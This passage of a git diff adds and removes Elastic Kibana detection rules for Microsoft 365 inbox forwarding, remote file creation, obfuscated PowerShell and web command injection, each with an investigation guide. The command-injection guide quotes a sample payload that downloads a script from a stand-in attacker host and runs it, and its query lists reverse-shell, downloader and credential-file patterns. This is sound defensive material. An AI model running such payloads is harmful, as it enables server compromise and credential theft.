"e903ce9a-5ce6-4246-bb14-75ed3ec2edf5_9", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_213.json b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_213.json new file mode 100644 index 00000000000..eff844917e9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_213.json @@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Gary Blackwell", + "Austin Songer", + "Marco Pedrinazzi" + ], + "description": "Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges.", + "false_positives": [ + "Users and Administrators can create inbox rules for legitimate purposes. Verify if it complies with the company policy and done with the user's consent. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-9m", + "index": [ + "logs-o365.audit-*", + "filebeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "M365 Exchange Inbox Forwarding Rule Created", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating M365 Exchange Inbox Forwarding Rule Created\n\nMicrosoft 365 allows users to create inbox rules to automate email management, such as forwarding messages to another address. While useful, attackers can exploit these rules to secretly redirect emails, facilitating data exfiltration. The detection rule monitors for the creation of such forwarding rules, focusing on successful events that specify forwarding parameters, thus identifying potential unauthorized email redirection activities.\n\n### Possible investigation steps\n\n- Review the event details to identify the user account associated with the creation of the forwarding rule by examining the o365.audit.Parameters.\n- Check the destination email address specified in the forwarding rule (ForwardTo, ForwardAsAttachmentTo, or RedirectTo) to determine if it is an external or suspicious address.\n- Investigate the user's recent activity logs in Microsoft 365 to identify any unusual or unauthorized actions, focusing on event.dataset:o365.audit and event.provider:Exchange.\n- Verify if the user has a legitimate reason to create such a forwarding rule by consulting with their manager or reviewing their role and responsibilities.\n- Assess if there have been any recent security incidents or alerts related to the user or the destination email address to identify potential compromise.\n- Consider disabling the forwarding rule temporarily and notifying the user and IT security team if the rule appears suspicious or unauthorized.\n\n### False positive analysis\n\n- Legitimate forwarding rules set by users for convenience or workflow purposes may trigger alerts. Review the context of the rule creation, such as the user and the destination address, to determine if it aligns with normal business operations.\n- Automated systems or third-party applications that integrate with Microsoft 365 might create forwarding rules as part of their functionality. Identify these systems and consider excluding their associated accounts from the rule.\n- Temporary forwarding rules set during user absence, such as vacations or leaves, can be mistaken for malicious activity. Implement a process to document and approve such rules, allowing for their exclusion from monitoring during the specified period.\n- Internal forwarding to trusted domains or addresses within the organization might not pose a security risk. Establish a list of trusted internal addresses and configure exceptions for these in the detection rule.\n- Frequent rule changes by specific users, such as IT administrators or support staff, may be part of their job responsibilities. Monitor these accounts separately and adjust the rule to reduce noise from expected behavior.\n\n### Response and remediation\n\n- Immediately disable the forwarding rule by accessing the affected user's mailbox settings in Microsoft 365 and removing any unauthorized forwarding rules.\n- Conduct a thorough review of the affected user's email account for any signs of compromise, such as unusual login activity or unauthorized changes to account settings.\n- Reset the password for the affected user's account and enforce multi-factor authentication (MFA) to prevent further unauthorized access.\n- Notify the user and relevant IT security personnel about the incident, providing details of the unauthorized rule and any potential data exposure.\n- Escalate the incident to the security operations team for further investigation and to determine if other accounts may have been targeted or compromised.\n- Implement additional monitoring on the affected account and similar high-risk accounts to detect any further suspicious activity or rule changes.\n- Review and update email security policies and configurations to prevent similar incidents, ensuring that forwarding rules are monitored and restricted as necessary.", + "query": "web where\n event.provider == \"Exchange\" and\n event.action in (\"New-InboxRule\", \"Set-InboxRule\") and\n event.outcome == \"success\" and\n (\n (?o365.audit.Parameters.ForwardTo != null and not endsWith~(?o365.audit.Parameters.ForwardTo, user.domain)) or\n (?o365.audit.Parameters.ForwardAsAttachmentTo != null and not endsWith~(?o365.audit.Parameters.ForwardAsAttachmentTo, user.domain)) or\n (?o365.audit.Parameters.ForwardingAddress != null and not endsWith~(?o365.audit.Parameters.ForwardingAddress, user.domain)) or\n (?o365.audit.Parameters.ForwardingSmtpAddress != null and not endsWith~(?o365.audit.Parameters.ForwardingSmtpAddress, user.domain)) or\n (?o365.audit.Parameters.RedirectTo != null and not endsWith~(?o365.audit.Parameters.RedirectTo, user.domain)) or\n (?o365.audit.Parameters.RedirectToRecipients != null and not endsWith~(?o365.audit.Parameters.RedirectToRecipients, user.domain))\n )\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/responding-to-a-compromised-email-account?view=o365-worldwide", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-outlook-rules-forms-attack?view=o365-worldwide", + "https://raw.githubusercontent.com/PwC-IR/Business-Email-Compromise-Guide/main/Extractor%20Cheat%20Sheet.pdf" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardAsAttachmentTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardingAddress", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardingSmtpAddress", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.RedirectTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.RedirectToRecipients", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: SaaS", + "Domain: Email", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Configuration Audit", + "Tactic: Collection", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.003", + "name": "Email Forwarding Rule", + "reference": "https://attack.mitre.org/techniques/T1114/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 213 + }, + "id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_213", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ed3fedc3-dd10-45a5-a485-34a8b48cea46_3.json b/packages/security_detection_engine/kibana/security_rule/ed3fedc3-dd10-45a5-a485-34a8b48cea46_3.json deleted file mode 100644 index 53cf2fe532a..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/ed3fedc3-dd10-45a5-a485-34a8b48cea46_3.json +++ /dev/null @@ -1,102 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule leverages the new_terms rule type to detect file creation via a commonly used file transfer service while excluding typical remote file creation activity. This behavior is often linked to lateral movement, potentially indicating an attacker attempting to move within a network.", - "from": "now-9m", - "history_window_start": "now-10d", - "index": [ - "logs-endpoint.events.file*", - "auditbeat-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Unusual Remote File Creation", - "new_terms_fields": [ - "process.executable", - "host.id" - ], - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Unusual Remote File Creation\n\nRemote file creation tools like SCP, FTP, and SFTP are essential for transferring files across networks, often used in legitimate administrative tasks. However, adversaries can exploit these services to move laterally within a network, creating files in unauthorized locations. The detection rule identifies suspicious file creation activities by monitoring specific processes and excluding typical paths, thus highlighting potential lateral movement attempts by attackers.\n\n### Possible investigation steps\n\n- Review the alert details to identify the specific process name (e.g., scp, ftp, sftp) involved in the file creation event.\n- Examine the file path where the file was created to determine if it is an unusual or unauthorized location, considering the exclusion of typical paths like /dev/ptmx, /run/*, or /var/run/*.\n- Check the user account associated with the process to verify if it is a legitimate user or if there are signs of compromised credentials.\n- Investigate the source and destination IP addresses involved in the file transfer to identify any suspicious or unexpected network connections.\n- Analyze recent activity on the host to identify any other unusual or unauthorized actions that may indicate lateral movement or further compromise.\n- Correlate this event with other alerts or logs to determine if it is part of a broader attack pattern or campaign within the network.\n\n### False positive analysis\n\n- Administrative file transfers: Legitimate administrative tasks often involve transferring files using SCP, FTP, or SFTP. To manage this, create exceptions for known administrative accounts or specific IP addresses that regularly perform these tasks.\n- Automated backup processes: Scheduled backups may use tools like rsync or sftp-server to create files remotely. Identify and exclude these processes by specifying the paths or scripts involved in the backup operations.\n- System updates and patches: Some system updates might involve remote file creation in non-standard directories. Monitor update schedules and exclude these activities by correlating them with known update events.\n- Development and testing environments: Developers may use remote file transfer services to deploy or test applications. Establish a baseline of typical development activities and exclude these from alerts by defining specific user accounts or project directories.\n- Third-party integrations: Some third-party applications might require remote file creation as part of their functionality. Document these integrations and exclude their associated processes or file paths from triggering alerts.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further lateral movement within the network. This can be done by removing the host from the network or applying network segmentation controls.\n- Terminate any suspicious processes identified in the alert, such as scp, ftp, sftp, vsftpd, sftp-server, or sync, to stop unauthorized file transfers.\n- Conduct a thorough review of the file paths and files created to determine if any sensitive data has been compromised or if any malicious files have been introduced.\n- Restore any unauthorized or malicious file changes from known good backups to ensure system integrity.\n- Update and patch the affected systems to close any vulnerabilities that may have been exploited by the attacker.\n- Implement stricter access controls and authentication mechanisms for remote file transfer services to prevent unauthorized use.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems have been compromised.\n", - "query": "event.category:file and host.os.type:linux and event.action:creation and\nprocess.name:(scp or ftp or sftp or vsftpd or sftp-server or sync) and\nnot file.path:(/dev/ptmx or /run/* or /var/run/*)\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "ed3fedc3-dd10-45a5-a485-34a8b48cea46", - "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1021", - "name": "Remote Services", - "reference": "https://attack.mitre.org/techniques/T1021/", - "subtechnique": [ - { - "id": "T1021.004", - "name": "SSH", - "reference": "https://attack.mitre.org/techniques/T1021/004/" - } - ] - }, - { - "id": "T1570", - "name": "Lateral Tool Transfer", - "reference": "https://attack.mitre.org/techniques/T1570/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 3 - }, - "id": "ed3fedc3-dd10-45a5-a485-34a8b48cea46_3", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f38633f4-3b31-4c80-b13d-e77c70ce8254_7.json b/packages/security_detection_engine/kibana/security_rule/f38633f4-3b31-4c80-b13d-e77c70ce8254_7.json deleted file mode 100644 index be5cacaed25..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/f38633f4-3b31-4c80-b13d-e77c70ce8254_7.json +++ /dev/null @@ -1,163 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that use reversed strings as a form of obfuscation. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential PowerShell Obfuscation via Reverse Keywords", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via Reverse Keywords\n\nPowerShell, a powerful scripting language in Windows environments, is often targeted by adversaries for obfuscation to bypass security measures like AMSI. Attackers reverse keywords in scripts to evade static analysis. The detection rule identifies such obfuscation by searching for reversed keywords, replacing them with a unique marker, and counting occurrences. This helps in flagging scripts with multiple obfuscated elements, indicating potential malicious activity.\n\n### Possible investigation steps\n\n- Review the `powershell.file.script_block_text` field to understand the context and content of the script that triggered the alert. Look for any suspicious or unexpected behavior in the script logic.\n- Examine the `file.path` field to determine the location of the script on the system. This can provide insights into whether the script is part of a legitimate application or potentially malicious.\n- Check the `powershell.file.script_block_id` and `powershell.sequence` fields to identify if the script is part of a larger sequence of commands. This can help in understanding the full scope of the script's execution.\n- Investigate the `agent.id` field to identify the specific endpoint where the script was executed. This can help in correlating with other alerts or logs from the same machine.\n- Assess the `count` field to determine the extent of obfuscation. A higher count may indicate a more heavily obfuscated script, suggesting a higher likelihood of malicious intent.\n\n### False positive analysis\n\n- Scripts with legitimate administrative functions may use reversed keywords for benign purposes, such as custom logging or debugging. Review the context of the script to determine if the usage is intentional and non-malicious.\n- Automated scripts generated by legitimate software tools might include reversed keywords as part of their normal operation. Identify these tools and create exceptions for their known script patterns to prevent unnecessary alerts.\n- Developers or IT personnel might use reversed keywords in test environments to simulate obfuscation techniques. Ensure these environments are well-documented and excluded from production monitoring to avoid false positives.\n- PowerShell scripts used in educational or training settings may intentionally include obfuscation techniques for learning purposes. Exclude these scripts by identifying their unique characteristics or file paths.\n- Regularly update the list of excluded scripts or patterns as new legitimate use cases are identified, ensuring the detection rule remains effective without generating excessive false positives.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further spread of potentially malicious scripts.\n- Terminate any suspicious PowerShell processes identified by the alert to halt ongoing malicious activity.\n- Conduct a thorough review of the script block text and associated files to understand the scope and intent of the obfuscation.\n- Remove or quarantine any identified malicious scripts or files from the system to prevent re-execution.\n- Restore affected systems from a known good backup if malicious activity has altered system integrity.\n- Update endpoint protection and security tools to recognize and block similar obfuscation techniques in the future.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and monitoring of potential lateral movement or additional threats.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter for scripts that contains these keywords using MATCH, boosts the query performance,\n// match will ignore the | and look for the individual words\n| where powershell.file.script_block_text : \"rahc|metsys|stekcos|tcejboimw|ecalper|ecnerferpe|noitcennoc|nioj|eman|vne|gnirts|tcejbo-wen|_23niw|noisserpxe|ekovni|daolnwod\"\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n \"\"\"(?i)(rahc|metsys|stekcos|tcejboimw|ecalper|ecnerferpe|noitcennoc|nioj|eman\\.|:vne$|gnirts|tcejbo-wen|_23niw|noisserpxe|ekovni|daolnwod)\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n agent.id\n\n// Filter for scripts that match the pattern at least twice\n| where Esql.script_block_pattern_count >= 2\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - } - ], - "risk_score": 21, - "rule_id": "f38633f4-3b31-4c80-b13d-e77c70ce8254", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 7 - }, - "id": "f38633f4-3b31-4c80-b13d-e77c70ce8254_7", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f3ac6734-7e52-4a0d-90b7-6847bf4308f2_3.json b/packages/security_detection_engine/kibana/security_rule/f3ac6734-7e52-4a0d-90b7-6847bf4308f2_3.json new file mode 100644 index 00000000000..3b70013cdbc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f3ac6734-7e52-4a0d-90b7-6847bf4308f2_3.json @@ -0,0 +1,265 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects potential command injection attempts via web server requests by identifying URLs that contain suspicious patterns commonly associated with command execution payloads. Attackers may exploit vulnerabilities in web applications to inject and execute arbitrary commands on the server, often using interpreters like Python, Perl, Ruby, PHP, or shell commands. By monitoring for these indicators in web traffic, security teams can identify and respond to potential threats early.", + "from": "now-11m", + "interval": "10m", + "language": "esql", + "license": "Elastic License v2", + "name": "Web Server Potential Command Injection Request", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Web Server Potential Command Injection Request\n\nThis rule flags web requests whose URLs embed command-execution payloads\u2014interpreter flags, shell invocations, netcat reverse shells, /dev/tcp, base64, credential file paths, downloaders, and suspicious temp or cron paths. It matters because attackers use low-volume, successful (200) requests to trigger server-side command injection and gain persistence or control without obvious errors. Example: a crafted query executes bash -c 'wget http://attacker/rev.sh -O /tmp/r; chmod +x /tmp/r; /tmp/r' from the web app, yielding a 200 while dropping and running a payload.\n\n### Possible investigation steps\n\n- Pull the raw HTTP request or PCAP, repeatedly URL-decode and base64-decode parameters, and extract shell metacharacters, commands, IP:port pairs, file paths, and download URLs to infer execution intent.\n- Time-correlate the request with host telemetry for web-server-owned child processes, file writes in /tmp, /dev/shm, or web roots, cron modifications, and new outbound connections from the same host.\n- Pivot on the source IP and user-agent to find related requests across other hosts/endpoints, identify scan-to-exploit sequencing and success patterns, and enact blocking or rate limiting if malicious.\n- Map the targeted route to its backend handler and review code/config to see if user input reaches exec/system/os.popen, templating/deserialization, or shell invocations, then safely reproduce in staging to validate exploitability.\n- If the payload references external indicators, search DNS/proxy/firewall telemetry for matching egress, retrieve and analyze any downloaded artifacts, and hunt for the same indicators across the fleet.\n\n### False positive analysis\n\n- A documentation or code-rendering page that echoes command-like strings from query parameters (e.g., \"bash -c\", \"python -c\", \"curl\", \"/etc/passwd\") returns 200 while merely displaying text, so the URL contains payload keywords without any execution.\n- A low-volume developer or QA test to a sandbox route includes path or query values like \"/dev/tcp/\", \"nc 10.0.0.1 4444\", \"busybox\", or \"chmod +x\" to validate input handling, the server returns 200 and the rule triggers despite no server-side execution path consuming those parameters.\n\n### Response and remediation\n\n- Block the offending source IPs and User-Agents at the WAF/reverse proxy, add virtual patches to drop URLs containing 'bash -c', '/dev/tcp', 'base64 -d', 'curl' or 'nc', and remove the targeted route from the load balancer until verified safe.\n- Isolate the impacted host from the network (at minimum egress) if the web service spawns child processes like bash/sh/python -c, creates files in /tmp or /dev/shm, modifies /etc/cron.*, or opens outbound connections to an IP:port embedded in the request.\n- Acquire volatile memory and preserve access/error logs and any downloaded script before cleanup, then terminate malicious child processes owned by nginx/httpd/tomcat/w3wp, delete dropped artifacts (e.g., /tmp/*, /dev/shm/*, suspicious files in the webroot), and revert cron/systemd or SSH key changes.\n- Rotate credentials and tokens if /etc/passwd, /etc/shadow, or ~/.ssh paths were targeted, rebuild the host or container from a known-good image, patch the application and dependencies, and validate clean startup with outbound traffic restricted to approved destinations.\n- Immediately escalate to the incident commander and legal/privacy if remote command execution is confirmed (evidence: web-server-owned 'bash -c' or 'python -c' executed, curl/wget download-and-execute, or reverse shell to an external IP:port) or if sensitive data exposure is suspected.\n- Harden by enforcing strict input validation, disabling shell/exec functions in the runtime (e.g., PHP disable_functions and no shell-outs in templates), running under least privilege with noexec,nodev /tmp and a read-only webroot, restricting egress by policy, and deploying WAF rules and host sensors to detect these strings and cron/webshell creation.\n", + "query": "from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*, logs-traefik.access-*\n| where\n // Limit to 200 response code to reduce noise\n http.response.status_code == 200\n\n| eval Esql.url_original_to_lower = to_lower(url.original)\n\n| eval Esql.contains_interpreter = case(Esql.url_original_to_lower like \"*python* -c*\" or Esql.url_original_to_lower like \"*perl* -e*\" or Esql.url_original_to_lower like \"*ruby* -e*\" or Esql.url_original_to_lower like \"*ruby* -rsocket*\" or Esql.url_original_to_lower like \"*lua* -e*\" or Esql.url_original_to_lower like \"*php* -r*\" or Esql.url_original_to_lower like \"*node* -e*\", 1, 0)\n| eval Esql.contains_shell = case(Esql.url_original_to_lower like \"*/bin/bash*\" or Esql.url_original_to_lower like \"*bash*-c*\" or Esql.url_original_to_lower like \"*/bin/sh*\" or Esql.url_original_to_lower rlike \"*sh.{1,2}-c*\", 1, 0)\n| eval Esql.contains_nc = case(Esql.url_original_to_lower like \"*netcat*\" or Esql.url_original_to_lower like \"*ncat*\" or Esql.url_original_to_lower rlike \"\"\".*nc.{1,2}[0-9]{1,3}(\\.[0-9]{1,3}){3}.{1,2}[0-9]{1,5}.*\"\"\" or Esql.url_original_to_lower like \"*nc.openbsd*\" or Esql.url_original_to_lower like \"*nc.traditional*\" or Esql.url_original_to_lower like \"*socat*\", 1, 0)\n| eval Esql.contains_devtcp = case(Esql.url_original_to_lower like \"*/dev/tcp/*\" or Esql.url_original_to_lower like \"*/dev/udp/*\", 1, 0)\n| eval Esql.contains_helpers = case((Esql.url_original_to_lower like \"*/bin/*\" or Esql.url_original_to_lower like \"*/usr/bin/*\") and (Esql.url_original_to_lower like \"*mkfifo*\" or Esql.url_original_to_lower like \"*nohup*\" or Esql.url_original_to_lower like \"*setsid*\" or Esql.url_original_to_lower like \"*busybox*\"), 1, 0)\n| eval Esql.contains_sus_cli = case(Esql.url_original_to_lower like \"*import*pty*spawn*\" or Esql.url_original_to_lower like \"*import*subprocess*call*\" or Esql.url_original_to_lower like \"*tcpsocket.new*\" or Esql.url_original_to_lower like \"*tcpsocket.open*\" or Esql.url_original_to_lower like \"*io.popen*\" or Esql.url_original_to_lower like \"*os.execute*\" or Esql.url_original_to_lower like \"*fsockopen*\", 1, 0)\n| eval Esql.contains_privileges = case(Esql.url_original_to_lower like \"*chmod*+x\", 1, 0)\n| eval Esql.contains_downloader = case(Esql.url_original_to_lower like \"*curl *\" or Esql.url_original_to_lower like \"*wget *\" , 1, 0)\n| eval Esql.contains_file_read_keywords = case(Esql.url_original_to_lower like \"*/etc/shadow*\" or Esql.url_original_to_lower like \"*/etc/passwd*\" or Esql.url_original_to_lower like \"*/root/.ssh/*\" or Esql.url_original_to_lower like \"*/home/*/.ssh/*\" or Esql.url_original_to_lower like \"*~/.ssh/*\" or Esql.url_original_to_lower like \"*/proc/self/environ*\", 1, 0)\n| eval Esql.contains_base64_cmd = case(Esql.url_original_to_lower like \"*base64*-d*\" or Esql.url_original_to_lower like \"*echo*|*base64*\", 1, 0)\n| eval Esql.contains_suspicious_path = case(Esql.url_original_to_lower like \"*/tmp/*\" or Esql.url_original_to_lower like \"*/var/tmp/*\" or Esql.url_original_to_lower like \"*/dev/shm/*\" or Esql.url_original_to_lower like \"*/root/*\" or Esql.url_original_to_lower like \"*/home/*/*\" or Esql.url_original_to_lower like \"*/var/www/*\" or Esql.url_original_to_lower like \"*/etc/cron.*/*\", 1, 0)\n\n| eval Esql.any_payload_keyword = case(\n Esql.contains_interpreter == 1 